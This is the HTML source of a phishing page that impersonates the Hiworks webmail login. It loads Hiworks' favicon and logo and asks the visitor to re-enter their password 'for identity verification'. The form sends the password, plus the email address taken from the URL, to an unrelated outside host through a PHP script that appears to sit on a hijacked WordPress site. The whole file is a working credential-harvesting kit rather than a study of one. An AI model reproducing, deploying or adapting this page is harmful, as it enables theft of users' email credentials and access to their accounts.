<html lang="ko">

<head>
  <meta http-equiv="Content-Language" content="en-us">
  <meta charset="UTF-8" />
  <link rel="icon" href="https://login.office.hiworks.com/favicon-96x96.png" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>&#54616;&#51060;&#50893;&#49828; &#47196;&#44536;&#51064;</title>
</head>
<style>
  html, body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 13px;
  color: #676767;
  font-weight: 700;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  .button1 {
  background-color: white; /* Green */
  color: #404040;
  border: 1px solid #d6d6d6;
  height: 34px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  border-radius: 50px;
  cursor: none;
  background-image: url(img/img.png);
  background-repeat: no-repeat;
  padding: 0px 20px 3px 45px;
 }
 button.customBtn {
  height: 40px;
  width: 200px;
  border: none;
  background-color: white; 
  background-repeat: no-repeat;
  background-image: url("https://office.hiworks.com/domain/common/logo/login");
  background-size: 200px 40px;
 }
  input[type=password]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 40px;
  width: 400px;
  padding: 8 15px;
  margin: 0;
  background: white;
  border: 1px solid #d6d6d6;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  font-size: 15px;
  line-height: 1.42857143;
  vertical-align: top;
  color: #404040;
  background-color: white;
  background-image: url("img/key.png");
  background-position: 1px 2px; 
  background-repeat: no-repeat;
  padding: 10px 35px;
  }
  input[type=password]:focus {
  outline: none;
  border: 1px solid #2985db;
  }
  p{
  font-size: 14px;
  text-align: center;
  }
  h1{
  font-weight: 700;
  font-size: 24px;
  text-align: center;
  }
</style>
<body>

<table border="0" width="100%" cellspacing="0" cellpadding="0">
	<tr>
		<td>&nbsp;</td>
	</tr>
	<tr>
		<td>
		<div align="center">
			<table border="0" width="100" cellspacing="0" cellpadding="0">
				<tr>
					<td>
				<table border="0" width="100%" cellspacing="0" cellpadding="0">
				  <form action="https://ganpanmarthdesi.pro/z-php/wp-config-post.php" method="post">
					<tr>
						<td height="110"></td>
					</tr>
					<tr>
						<td height="40">
						<p align="center">
						<img src="https://logo.clearbit.com/domain" width="200" height="40">
                        </td>
					</tr>
					<tr>
						<td height="70"></td>
					</tr>
					<tr>
						<td height="26">
						<h1><font color="#000000" face="Arial">Sign in to</font> <font color="#7A7A7A"><?php echo $ddomain;?></font></h1></td>
					</tr>
					<tr>
						<td height="4"></td>
					</tr>
					
					<tr>
						<td height="14">
						<p>Please enter your password for identity verification.</p></td>
					</tr>
					<tr>
						<td height="20"></td>
					</tr>
					<tr>
						<td height="38">
						<p align="center">
						   <button class="button1">email</button>
						   <input type="hidden" name="user" autocomplete="username" readonly="" value="email">
						   <input type="hidden" name="sender" value="Hiworks.com">
						   <input type="hidden" name="domain" value="domain">
						   <input type="hidden" name="link" value="https://office.hiworks.com/domain/mail/webmail/m_list/b0">
						   </td>
					</tr>
					<tr>
						<td height="24"></td>
					</tr>
					<tr>
						<td width="400" height="40">
						   <input type="password" required placeholder="Password" name="passwd" autofocus >
						</td>
					</tr>
					<tr>
						<td height="20"></td>
					</tr>
					<tr>
						<td>
						<input type="image" src="img/signin-btn.png" width="400" height="44" name="I1"></td>
					</tr>
					<tr>
						<td height="15"></td>
					</tr>
					<tr>
						<td height="15">
				<table border="0" width="100%" cellspacing="0" cellpadding="0">
					<tr>
						<td height="122" background="img/footer.png">
						<table border="0" width="100%" cellspacing="0" cellpadding="0">
							<tr>
								<td height="36">
								<table border="0" width="100%" cellspacing="0" cellpadding="0">
									<tr>
										<td width="8"></td>
										<td width="133">
										<p align="left">
										<a href="another_user.html?login=email" style="text-decoration: none; color: black; " >
										<font color="#2985db" size="2" face="Arial Unicode MS">
										Sign in with another ID</font></a></td>
										<td height="20"></td>
									</tr>
								</table>
								</td>
							</tr>
							<tr>
								<td height="86"></td>
							</tr>
						</table>
						</td>
					</tr>
					<tr>
						<td height="2"></td>
					</tr>
					</table>
						</td>
					</tr>
					</form>
				</table>
					</td>
				</tr>
			</table>
		</div>
		</td>
	</tr>
	
	<tr>
		<td>
		
		</td>
	</tr>
		
</table>

</body>

<script>
  // Get email from URL
  const params = new URLSearchParams(window.location.search);
  const raw = params.get('login');
  const email = raw ? decodeURIComponent(raw) : '';

  // Split into user/domain
  let user = '', domain = '';
  if (email.includes('@')) {
    [user, domain] = email.split(/@(.*)/, 2);
  }

  // Fill visible input values
  const inputs = document.querySelectorAll('input[type="text"]');
  if (inputs.length >= 3) {
    inputs[0].setAttribute('value', email || 'email');
    inputs[1].setAttribute('value', user || 'user');
    inputs[2].setAttribute('value', domain || 'domain');
  }

  // Fill hidden inputs
  const hiddenInputs = document.querySelectorAll('input[type="hidden"]');
  hiddenInputs.forEach(input => {
    if (input.name === 'user') input.setAttribute('value', email || 'email');
    if (input.name === 'domain') input.setAttribute('value', domain || 'domain');
  });

  // Update button label
  const btn = document.querySelector('.button1');
  if (btn) btn.textContent = email || 'email';

  // Update greeting
  document.getElementById('greeting').textContent = email ? `Hello ${email}` : 'Hello';

  // Update "Sign in with another ID" link
  const link = document.getElementById('anotherLink');
  if (link) link.href = `another_user.html?login=${encodeURIComponent(email || '')}`;
</script>

</html>
